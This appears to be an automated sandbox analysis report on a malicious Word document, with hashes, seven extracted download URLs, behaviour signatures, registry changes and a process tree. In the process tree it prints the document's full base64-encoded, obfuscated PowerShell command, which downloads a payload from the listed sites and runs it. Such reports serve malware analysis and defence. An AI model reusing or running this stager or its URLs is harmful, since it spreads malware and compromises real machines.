Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
14-09-2024 06:34
Behavioral task
behavioral1
Sample
dfa9d4948809090797a951edffa5ea93_JaffaCakes118.doc
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
dfa9d4948809090797a951edffa5ea93_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
dfa9d4948809090797a951edffa5ea93_JaffaCakes118.doc
-
Size
241KB
-
MD5
dfa9d4948809090797a951edffa5ea93
-
SHA1
1f3d636766c650733c7e66be530f345246005d2c
-
SHA256
5af58ca99bb8ab1c5502499b987781f73cc44491b3fa9e15c03d418cd84bea17
-
SHA512
733acec680d6ceaab2dc0085bd8ee1dca2090649c39a2d22326a8019102f044e8aaf077e61040ede7e4781e80d8b479617389a126334f68a96804fea7ec3e6cb
-
SSDEEP
3072:wYy0u8YGgjv+ZvchmkHcI/o1/Vb6///////////////////////////////////F:40uXnWFchmmcI/o1/dOftz
Malware Config
Extracted
http://www.ksgresearch.org/LLC/z9B/
http://www.mitrausahacontrucion.com/multifunctional-section/X2v4XN/
http://daprofesional.com/data4/rsdbA1h/
http://degisimkalip.com.tr/wp-admin/ZML/
http://da-industrial.com/js/6GGA48AK/
http://cse-engineer.com/cgi-bin/BOiL/
http://casabeethovenlb.com/classes/7SUlG/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3008 2620 powershell.exe 30 -
Blocklisted process makes network request 8 IoCs
flow pid Process 7 3008 powershell.exe 8 3008 powershell.exe 10 3008 powershell.exe 11 3008 powershell.exe 12 3008 powershell.exe 14 3008 powershell.exe 15 3008 powershell.exe 17 3008 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{056578E8-21E2-495A-9BBF-97DBE88813E0}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\TypeLib\{056578E8-21E2-495A-9BBF-97DBE88813E0}\2.0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\TypeLib\{056578E8-21E2-495A-9BBF-97DBE88813E0}\2.0\FLAGS\ = "6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{056578E8-21E2-495A-9BBF-97DBE88813E0}\2.0\0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\TypeLib\{056578E8-21E2-495A-9BBF-97DBE88813E0} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{056578E8-21E2-495A-9BBF-97DBE88813E0}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\TypeLib\{056578E8-21E2-495A-9BBF-97DBE88813E0}\2.0\HELPDIR WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2856 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3008 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3008 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2856 WINWORD.EXE 2856 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2856 wrote to memory of 2384 2856 WINWORD.EXE 34 PID 2856 wrote to memory of 2384 2856 WINWORD.EXE 34 PID 2856 wrote to memory of 2384 2856 WINWORD.EXE 34 PID 2856 wrote to memory of 2384 2856 WINWORD.EXE 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dfa9d4948809090797a951edffa5ea93_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -encod JABDADYAZABfADIAcwA4AD0AKAAoACcATQB3ACcAKwAnAHcAJwApACsAJwBrADEAJwArACcAbgBtACcAKQA7ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBTAGUAcgBQAFIATwBGAGkAbABlAFwARwAxADAAcABnAGkAOABcAFoAVABUAHgAQgA0AE8AXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIARQBjAFQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBgAGMAVQBSAGAASQBUAHkAcAByAG8AVABPAGMAYABPAEwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAxACcAKQArACcAMgAnACsAKAAnACwAJwArACcAIAB0AGwAJwApACsAKAAnAHMAJwArACcAMQAxACwAIAAnACkAKwAnAHQAbAAnACsAJwBzACcAKQA7ACQAVwAwAGwAagBpADkAZQAgAD0AIAAoACcARgAnACsAJwB1AHgAJwArACgAJwA4ACcAKwAnADYAdgAnACkAKQA7ACQASwBzAGwAZgA2AHUAZgA9ACgAKAAnAEIAdgBpACcAKwAnAGcAbgAnACkAKwAnADYAZQAnACkAOwAkAFEAbwA0AGYAbgBjADMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwACcAKwAnAH0AJwArACcARwAxADAAcABnAGkAOAB7ADAAJwArACcAfQBaAHQAdAB4AGIANABvAHsAMAB9ACcAKQAgAC0ARgAgAFsAYwBoAEEAUgBdADkAMgApACsAJABXADAAbABqAGkAOQBlACsAKAAnAC4AJwArACgAJwBlACcAKwAnAHgAZQAnACkAKQA7ACQAVAA1ADcAOQB2AHcAdwA9ACgAJwBRACcAKwAoACcAaABvAHAAJwArACcAcwAnACkAKwAnAGYAcgAnACkAOwAkAFcAYwB1ADEAbwB0AHgAPQAmACgAJwBuAGUAJwArACcAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAYwBMAEkAZQBOAHQAOwAkAEQAagA0AHEAagBhAHgAPQAoACgAJwBoAHQAdABwACcAKwAnADoALwAvAHcAdwAnACsAJwB3ACcAKwAnAC4AawBzAGcAJwApACsAKAAnAHIAZQBzACcAKwAnAGUAYQByACcAKwAnAGMAaAAnACsAJwAuAG8AcgBnAC8ATABMAEMAJwArACcALwAnACsAJwB6ADkAQgAvACoAJwApACsAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAJwApACsAKAAnADoAJwArACcALwAvAHcAdwAnACkAKwAoACcAdwAuAG0AaQB0AHIAJwArACcAYQB1ACcAKwAnAHMAYQBoACcAKQArACcAYQAnACsAKAAnAGMAbwAnACsAJwBuAHQAcgAnACkAKwAnAHUAYwAnACsAJwBpAG8AJwArACcAbgAnACsAJwAuAGMAJwArACcAbwAnACsAKAAnAG0AJwArACcALwBtACcAKQArACgAJwB1AGwAdAAnACsAJwBpACcAKwAnAGYAdQAnACsAJwBuAGMAdABpAG8AbgAnACsAJwBhAGwALQBzAGUAJwApACsAKAAnAGMAdAAnACsAJwBpACcAKQArACcAbwBuACcAKwAnAC8AJwArACcAWAAyACcAKwAoACcAdgA0AFgAJwArACcATgAvACcAKQArACgAJwAqAGgAJwArACcAdAAnACkAKwAnAHQAJwArACgAJwBwADoAJwArACcALwAvAGQAYQAnACsAJwBwAHIAJwArACcAbwBmAGUAcwAnACsAJwBpAG8AbgBhACcAKwAnAGwALgAnACkAKwAnAGMAJwArACcAbwAnACsAKAAnAG0ALwBkAGEAdAAnACsAJwBhADQALwByAHMAJwArACcAZABiAEEAJwApACsAJwAxAGgAJwArACgAJwAvACcAKwAnACoAaAB0AHQAcAAnACkAKwAoACcAOgAvAC8AZABlACcAKwAnAGcAJwArACcAaQBzACcAKQArACcAaQAnACsAKAAnAG0AawBhAGwAaQBwACcAKwAnAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC4AdAByAC8AJwApACsAKAAnAHcAcAAtAGEAZAAnACsAJwBtAGkAbgAnACsAJwAvAFoATQBMAC8AJwArACcAKgAnACkAKwAnAGgAdAAnACsAKAAnAHQAcAA6ACcAKwAnAC8ALwBkAGEAJwApACsAKAAnAC0AaQBuACcAKwAnAGQAdQAnACkAKwAnAHMAJwArACgAJwB0AHIAJwArACcAaQAnACkAKwAnAGEAJwArACcAbAAnACsAKAAnAC4AJwArACcAYwBvAG0ALwBqAHMALwAnACsAJwA2ACcAKQArACgAJwBHAEcAQQA0ADgAJwArACcAQQBLAC8AJwArACcAKgAnACkAKwAoACcAaAAnACsAJwB0AHQAcAA6ACcAKQArACgAJwAvACcAKwAnAC8AYwBzAGUALQBlACcAKQArACgAJwBuAGcAJwArACcAaQAnACkAKwAnAG4AJwArACgAJwBlAGUAcgAnACsAJwAuAGMAbwBtACcAKwAnAC8AYwAnACsAJwBnAGkALQBiAGkAbgAvAEIATwAnACsAJwBpAEwALwAnACkAKwAnACoAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQArACgAJwA6AC8AJwArACcALwBjAGEAcwBhACcAKQArACgAJwBiAGUAJwArACcAZQB0AGgAbwAnACkAKwAoACcAdgBlAG4AbABiACcAKwAnAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AYwAnACsAJwBsAGEAcwAnACkAKwAoACcAcwBlAHMALwA3AFMAJwArACcAVQAnACkAKwAoACcAbAAnACsAJwBHAC8AJwApACkALgAiAHMAYABQAGwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQATgBtAHkAcwBwAG0AYwA9ACgAKAAnAEoAcQB1ACcAKwAnADEAJwApACsAKAAnAHIAZwAnACsAJwBfACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAQgBsAHUANwB4ADQAXwAgAGkAbgAgACQARABqADQAcQBqAGEAeAApAHsAdAByAHkAewAkAFcAYwB1ADEAbwB0AHgALgAiAEQAbwBgAFcAbgBMAE8AQQBgAGQARgBgAGkATABlACIAKAAkAEIAbAB1ADcAeAA0AF8ALAAgACQAUQBvADQAZgBuAGMAMwApADsAJABDAGoANwBjADAAeQA5AD0AKAAnAFcAJwArACgAJwB1AHQAJwArACcAeAAnACkAKwAoACcAZwAxACcAKwAnAHkAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQAUQBvADQAZgBuAGMAMwApAC4AIgBMAEUAbgBnAGAAVABoACIAIAAtAGcAZQAgADMAOAAxADUAMgApACAAewAuACgAJwBJAG4AdgBvACcAKwAnAGsAZQAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACgAJABRAG8ANABmAG4AYwAzACkAOwAkAEEAeQBhAGcAdwA3AHAAPQAoACcASgAnACsAKAAnAHYAZQBjADgAJwArACcAawAnACkAKwAnAHEAJwApADsAYgByAGUAYQBrADsAJABDAG0AagBrAHAAagA2AD0AKAAoACcAVwB4ADYANABwACcAKwAnAG4AJwApACsAJwB4ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQB3AHEAcwAwAGUAcgA9ACgAKAAnAEwAbAAnACsAJwB2AGQAJwApACsAKAAnADQAMQAnACsAJwBfACcAKQApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5df244885ce9c3760fa490050d07285ac
SHA1ff6d78abd2afe49d9b8247b0ec283839c76c2942
SHA25675327e99218971d7e0606cd326f53d5de882bc5a75e8d85f57473a8dedc51862
SHA51246498af3f663692d35704d26ebadf428b02e735310af5d5790ddb2ee8322c23256d99cda247ed1290c8420dfbfdbc6772aebe483a4f7d4703720c73c2ea8aea1